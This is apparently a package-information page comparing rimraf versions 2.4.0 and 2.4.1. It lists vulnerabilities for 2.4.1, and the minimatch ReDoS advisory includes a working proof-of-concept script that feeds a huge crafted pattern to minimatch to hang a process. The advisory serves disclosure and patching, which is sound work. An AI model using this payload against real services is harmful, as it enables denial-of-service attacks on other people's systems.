Rimraf is a Node.js package providing a powerful and robust solution for recursively deleting files and directories, akin to the rm -rf command in Unix-like systems. Versions 2.4.0 and 2.4.1 offer similar core functionalities for developers needing to ensure complete and forceful removal of file system elements in their applications. Both versions depend on glob for file pattern matching and include development dependencies like tap for testing and mkdirp for directory creation during development. They are licensed under ISC and maintain the same author and repository information.
The primary difference between version 2.4.0 and 2.4.1 lies in their release date and potentially very minor bug fixes or internal improvements. Version 2.4.1 was released on June 30, 2015, subsequent to version 2.4.0 released on June 7, 2015. For developers, this suggests focusing on using the latest stable version (2.4.1) due to potential bug fixes and subtle improvements implemented since the prior release and to keep dependency updates simpler. While the core functionality remains consistent, minor version updates like this often address edge cases or optimize performance, making the newer version the preferred choice for most applications requiring reliable and deep file deletion capabilities. This package helps developers simplify complex cleanup operations within their node applications.
All the vulnerabilities related to the version 2.4.1 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.